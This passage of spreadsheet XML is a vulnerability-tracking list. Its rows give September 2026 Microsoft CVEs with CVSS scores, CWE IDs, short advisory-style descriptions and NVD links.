          <t>CWE-441, CWE-522</t>
        </is>
      </c>
      <c r="S326"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T326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86600</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47297</t>
        </is>
      </c>
      <c r="D327" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E327" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F327" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G327" s="5" t="inlineStr"/>
      <c r="H327" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I327" s="5" t="inlineStr"/>
      <c r="J327" s="5" t="inlineStr"/>
      <c r="K327" s="5" t="inlineStr"/>
      <c r="L327" s="5" t="inlineStr"/>
      <c r="M327" s="5" t="inlineStr"/>
      <c r="N327" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O327" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P327" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q327" s="5" t="inlineStr"/>
      <c r="R327" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S327" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47297</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55007</t>
        </is>
      </c>
      <c r="D328" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E328" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F328" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G328" s="5" t="inlineStr"/>
      <c r="H328" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I328" s="5" t="inlineStr"/>
      <c r="J328" s="5" t="inlineStr"/>
      <c r="K328" s="5" t="inlineStr"/>
      <c r="L328" s="5" t="inlineStr"/>
      <c r="M328" s="5" t="inlineStr"/>
      <c r="N328" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O328" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P328" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q328" s="5" t="inlineStr"/>
      <c r="R328" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S328" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Exchange Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55007</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69325</t>
        </is>
      </c>
      <c r="D329" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E329" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F329" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G329" s="5" t="inlineStr"/>
      <c r="H329" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I329" s="5" t="inlineStr"/>
      <c r="J329" s="5" t="inlineStr"/>
      <c r="K329" s="5" t="inlineStr"/>
      <c r="L329" s="5" t="inlineStr"/>
      <c r="M329" s="5" t="inlineStr"/>
      <c r="N329" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O329" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P329" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q329" s="5" t="inlineStr"/>
      <c r="R329" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S329" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft JScript allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69325</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69380</t>
        </is>
      </c>
      <c r="D330" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E330" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F330" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G330" s="5" t="inlineStr"/>
      <c r="H330" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I330" s="5" t="inlineStr"/>
      <c r="J330" s="5" t="inlineStr"/>
      <c r="K330" s="5" t="inlineStr"/>
      <c r="L330" s="5" t="inlineStr"/>
      <c r="M330" s="5" t="inlineStr"/>
      <c r="N330" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O330" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P330" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q330" s="5" t="inlineStr"/>
      <c r="R330" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S330" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69380</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69438</t>
        </is>
      </c>
      <c r="D331" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E331" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F331" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G331" s="5" t="inlineStr"/>
      <c r="H331" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I331" s="5" t="inlineStr"/>
      <c r="J331" s="5" t="inlineStr"/>
      <c r="K331" s="5" t="inlineStr"/>
      <c r="L331" s="5" t="inlineStr"/>
      <c r="M331" s="5" t="inlineStr"/>
      <c r="N331" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O331" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P331" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q331" s="5" t="inlineStr"/>
      <c r="R331" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="S331" s="5" t="inlineStr">
        <is>
          <t>Incorrect conversion between numeric types in Microsoft JScript allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69438</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69510</t>
        </is>
      </c>
      <c r="D332" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E332" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F332" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G332" s="5" t="inlineStr"/>
      <c r="H332" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I332" s="5" t="inlineStr"/>
      <c r="J332" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K332" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L332" s="5" t="inlineStr"/>
      <c r="M332" s="5" t="inlineStr"/>
      <c r="N332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O332" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P332" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q332" s="5" t="inlineStr"/>
      <c r="R332" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S332" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69510</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69524</t>
        </is>
      </c>
      <c r="D333" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E333" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F333" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G333" s="5" t="inlineStr"/>
      <c r="H333" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I333" s="5" t="inlineStr"/>
      <c r="J333" s="5" t="inlineStr"/>
      <c r="K333" s="5" t="inlineStr"/>
      <c r="L333" s="5" t="inlineStr"/>
      <c r="M333" s="5" t="inlineStr"/>
      <c r="N333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O333" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P333" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q333" s="5" t="inlineStr"/>
      <c r="R333" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S333" s="5" t="inlineStr">
        <is>
          <t>Use after free in Active Directory Domain Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69524</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69530</t>
        </is>
      </c>
      <c r="D334" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E334" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F334" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G334" s="5" t="inlineStr"/>
      <c r="H334" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I334" s="5" t="inlineStr"/>
      <c r="J334" s="5" t="inlineStr"/>
      <c r="K334" s="5" t="inlineStr"/>
      <c r="L334" s="5" t="inlineStr"/>
      <c r="M334" s="5" t="inlineStr"/>
      <c r="N334" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O334" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P334" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q334" s="5" t="inlineStr"/>
      <c r="R334" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S334" s="5" t="inlineStr">
        <is>
          <t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69530</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69546</t>
        </is>
      </c>
      <c r="D335" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E335" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F335" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G335" s="5" t="inlineStr"/>
      <c r="H335" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I335" s="5" t="inlineStr"/>
      <c r="J335" s="5" t="inlineStr"/>
      <c r="K335" s="5" t="inlineStr"/>
      <c r="L335" s="5" t="inlineStr"/>
      <c r="M335" s="5" t="inlineStr"/>
      <c r="N335" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O335" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P335" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q335" s="5" t="inlineStr"/>
      <c r="R335" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S335" s="5" t="inlineStr">
        <is>
          <t>Use after free in Active Directory Domain Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69546</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69620</t>
        </is>
      </c>
      <c r="D336" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E336" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F336" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G336" s="5" t="inlineStr"/>
      <c r="H336" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I336" s="5" t="inlineStr"/>
      <c r="J336" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K336" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L336" s="5" t="inlineStr"/>
      <c r="M336" s="5" t="inlineStr"/>
      <c r="N336" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O336" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P336" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q336" s="5" t="inlineStr"/>
      <c r="R336" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S336" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69620</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69680</t>
        </is>
      </c>
      <c r="D337" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E337" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F337" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G337" s="5" t="inlineStr"/>
      <c r="H337" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I337" s="5" t="inlineStr"/>
      <c r="J337" s="5" t="inlineStr"/>
      <c r="K337" s="5" t="inlineStr"/>
      <c r="L337" s="5" t="inlineStr"/>
      <c r="M337" s="5" t="inlineStr"/>
      <c r="N337" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O337" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P337" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q337" s="5" t="inlineStr"/>
      <c r="R337" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="S337" s="5" t="inlineStr">
        <is>
          <t>Origin validation error in Windows DNS allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="T337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69680</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69732</t>
        </is>
      </c>
      <c r="D338" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E338" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F338" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G338" s="5" t="inlineStr"/>
      <c r="H338" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I338" s="5" t="inlineStr"/>
      <c r="J338" s="5" t="inlineStr"/>
      <c r="K338" s="5" t="inlineStr"/>
      <c r="L338" s="5" t="inlineStr"/>
      <c r="M338" s="5" t="inlineStr"/>
      <c r="N338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O338" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P338" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q338" s="5" t="inlineStr"/>
      <c r="R338" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S338" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69732</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69782</t>
        </is>
      </c>
      <c r="D339" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E339" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F339" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G339" s="5" t="inlineStr"/>
      <c r="H339" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I339" s="5" t="inlineStr"/>
      <c r="J339" s="5" t="inlineStr"/>
      <c r="K339" s="5" t="inlineStr"/>
      <c r="L339" s="5" t="inlineStr"/>
      <c r="M339" s="5" t="inlineStr"/>
      <c r="N339" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O339" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P339" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q339" s="5" t="inlineStr"/>
      <c r="R339" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S339" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69782</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69786</t>
        </is>
      </c>
      <c r="D340" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E340" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F340" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G340" s="5" t="inlineStr"/>
      <c r="H340" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I340" s="5" t="inlineStr"/>
      <c r="J340" s="5" t="inlineStr"/>
      <c r="K340" s="5" t="inlineStr"/>
      <c r="L340" s="5" t="inlineStr"/>
      <c r="M340" s="5" t="inlineStr"/>
      <c r="N340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O340" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P340" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q340" s="5" t="inlineStr"/>
      <c r="R340" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S340" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69786</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69813</t>
        </is>
      </c>
      <c r="D341" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E341" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F341" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G341" s="5" t="inlineStr"/>
      <c r="H341" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I341" s="5" t="inlineStr"/>
      <c r="J341" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K341" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L341" s="5" t="inlineStr"/>
      <c r="M341" s="5" t="inlineStr"/>
      <c r="N341" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O341" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P341" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q341" s="5" t="inlineStr"/>
      <c r="R341" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S341" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69813</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69827</t>
        </is>
      </c>
      <c r="D342" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E342" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F342" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G342" s="5" t="inlineStr"/>
      <c r="H342" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I342" s="5" t="inlineStr"/>
      <c r="J342" s="5" t="inlineStr"/>
      <c r="K342" s="5" t="inlineStr"/>
      <c r="L342" s="5" t="inlineStr"/>
      <c r="M342" s="5" t="inlineStr"/>
      <c r="N342" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O342" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P342" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q342" s="5" t="inlineStr"/>
      <c r="R342" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S342" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69827</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69858</t>
        </is>
      </c>
      <c r="D343" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E343" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F343" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G343" s="5" t="inlineStr"/>
      <c r="H343" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I343" s="5" t="inlineStr"/>
      <c r="J343" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K343" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L343" s="5" t="inlineStr"/>
      <c r="M343" s="5" t="inlineStr"/>
      <c r="N343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O343" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P343" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q343" s="5" t="inlineStr"/>
      <c r="R343" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S343" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69858</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C344" s="5" t="inlineStr">
        <is>
